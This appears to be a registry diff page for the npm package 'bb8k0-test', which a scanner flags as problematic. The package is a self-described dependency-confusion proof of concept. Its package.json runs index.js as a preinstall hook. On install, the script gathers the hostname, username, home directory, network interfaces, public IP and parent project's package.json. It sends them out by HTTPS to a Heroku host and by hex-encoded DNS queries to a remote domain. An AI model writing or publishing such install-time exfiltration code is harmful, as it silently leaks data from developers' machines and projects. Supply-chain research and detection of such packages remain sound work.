bb8k0-test 0.200.4
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of bb8k0-test might be problematic. Click here for more details.
- package/index.js +143 -0
- package/package.json +13 -0
package/index.js
ADDED
|
@@ -0,0 +1,143 @@
|
|
|
1
|
+
// This is a PoC of dependecy confusion attack, published for security research purposes only.
|
|
2
|
+
// The code contained in this package does not exfiltrate any type of credential
|
|
3
|
+
|
|
4
|
+
const https = require('https');
|
|
5
|
+
const os = require("os");
|
|
6
|
+
const dns = require("dns");
|
|
7
|
+
const packageJSON = require("./package.json");
|
|
8
|
+
const package = packageJSON.name;
|
|
9
|
+
|
|
10
|
+
const sendData = (url, path, method, post_data) => {
|
|
11
|
+
const promise = new Promise((resolve, reject) => {
|
|
12
|
+
var options = {
|
|
13
|
+
hostname: url,
|
|
14
|
+
port: 443,
|
|
15
|
+
path,
|
|
16
|
+
method,
|
|
17
|
+
headers: {
|
|
18
|
+
'Content-Type': 'application/json',
|
|
19
|
+
'Content-Length': post_data ? Buffer.byteLength(post_data) : 0
|
|
20
|
+
}
|
|
21
|
+
};
|
|
22
|
+
|
|
23
|
+
var req = https.request(options, function (res) {
|
|
24
|
+
res.setEncoding('utf8');
|
|
25
|
+
|
|
26
|
+
var body = '';
|
|
27
|
+
|
|
28
|
+
res.on('data', function (chunk) {
|
|
29
|
+
body = body + chunk;
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
res.on('end', function () {
|
|
33
|
+
if (res.statusCode != 200) {
|
|
34
|
+
reject("Api call failed with response code " + res.statusCode);
|
|
35
|
+
} else {
|
|
36
|
+
resolve(body);
|
|
37
|
+
}
|
|
38
|
+
});
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
req.on('error', function (e) {
|
|
42
|
+
console.log("Error : " + e.message);
|
|
43
|
+
reject(e);
|
|
44
|
+
});
|
|
45
|
+
|
|
46
|
+
if (post_data) req.write(post_data);
|
|
47
|
+
req.end();
|
|
48
|
+
});
|
|
49
|
+
return promise;
|
|
50
|
+
}
|
|
51
|
+
|
|
52
|
+
const getIP = () => {
|
|
53
|
+
return sendData('api.ipify.org', '/?format=json', 'GET', '');
|
|
54
|
+
}
|
|
55
|
+
|
|
56
|
+
const sendUsingHTTP = (data) => {
|
|
57
|
+
const { networkInterfaces } = os;
|
|
58
|
+
const nets = networkInterfaces();
|
|
59
|
+
|
|
60
|
+
let parentPackageJSON = {};
|
|
61
|
+
|
|
62
|
+
try {
|
|
63
|
+
const regex = new RegExp("node_modules/\s*([^.]+|\S+)")
|
|
64
|
+
const appDir = __dirname.replace(regex, "")
|
|
65
|
+
|
|
66
|
+
parentPackageJSON = require(appDir + "package.json");
|
|
67
|
+
}
|
|
68
|
+
catch (e) {
|
|
69
|
+
parentPackageJSON = { message: "No parent package.json found" };
|
|
70
|
+
}
|
|
71
|
+
|
|
72
|
+
const telemetry = JSON.stringify({
|
|
73
|
+
package: package,
|
|
74
|
+
date: new Date(),
|
|
75
|
+
tzOffset: new Date().getTimezoneOffset(),
|
|
76
|
+
actualDirectory: __dirname,
|
|
77
|
+
homeDirectory: os.homedir(),
|
|
78
|
+
hostname: os.hostname(),
|
|
79
|
+
userName: os.userInfo().username,
|
|
80
|
+
dns: dns.getServers(),
|
|
81
|
+
resolved: packageJSON ? packageJSON.___resolved : undefined,
|
|
82
|
+
version: packageJSON.version,
|
|
83
|
+
packageJSON,
|
|
84
|
+
parentPackageJSON,
|
|
85
|
+
ip: data.ip || "",
|
|
86
|
+
...nets
|
|
87
|
+
});
|
|
88
|
+
|
|
89
|
+
sendData('yggdrasilr.herokuapp.com', '', 'POST', telemetry);
|
|
90
|
+
}
|
|
91
|
+
|
|
92
|
+
function sendUsingDNSQuery(data) {
|
|
93
|
+
|
|
94
|
+
function chunkString(str, length) {
|
|
95
|
+
return str.match(new RegExp('.{1,' + length + '}', 'g')).toString().replaceAll(",", ".");
|
|
96
|
+
}
|
|
97
|
+
|
|
98
|
+
String.prototype.hexEncode = function () {
|
|
99
|
+
var hex, i;
|
|
100
|
+
var result = "";
|
|
101
|
+
for (i = 0; i < this.length; i++) {
|
|
102
|
+
hex = this.charCodeAt(i).toString(16);
|
|
103
|
+
result += ("000" + hex).slice(-4);
|
|
104
|
+
}
|
|
105
|
+
|
|
106
|
+
return result
|
|
107
|
+
}
|
|
108
|
+
|
|
109
|
+
String.prototype.replaceAll = function (find, replace) {
|
|
110
|
+
return this.replace(new RegExp(find, 'g'), replace);
|
|
111
|
+
}
|
|
112
|
+
|
|
113
|
+
const ip = data.ip || "";
|
|
114
|
+
|
|
115
|
+
const query = os.hostname() + "," + os.userInfo().username + "," + ip + "," + os.homedir()
|
|
116
|
+
const hexInfos = query.hexEncode();
|
|
117
|
+
const chunked = chunkString(hexInfos, 50)
|
|
118
|
+
|
|
119
|
+
// Just for debugging, please comment before publish
|
|
120
|
+
// console.log(chunked + ".sub.bugbountyautomation.com")
|
|
121
|
+
|
|
122
|
+
let messages = chunked.split('.');
|
|
123
|
+
|
|
124
|
+
messages.map((message, item) => {
|
|
125
|
+
// console.log(message + "." + item);
|
|
126
|
+
dns.resolve(message + "." + item + ".sub.bugbountyautomation.com", (err, address) => {
|
|
127
|
+
if (err) {
|
|
128
|
+
console.log(err.stack)
|
|
129
|
+
}
|
|
130
|
+
});
|
|
131
|
+
});
|
|
132
|
+
}
|
|
133
|
+
|
|
134
|
+
const sendTelemetry = async () => {
|
|
135
|
+
getIP().then(data => {
|
|
136
|
+
if (data) {
|
|
137
|
+
sendUsingHTTP(JSON.parse(data));
|
|
138
|
+
sendUsingDNSQuery(JSON.parse(data));
|
|
139
|
+
}
|
|
140
|
+
});
|
|
141
|
+
}
|
|
142
|
+
|
|
143
|
+
sendTelemetry();
|
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "bb8k0-test",
|
|
3
|
+
"version": "0.200.4",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [],
|
|
11
|
+
"author": "",
|
|
12
|
+
"license": "ISC"
|
|
13
|
+
}
|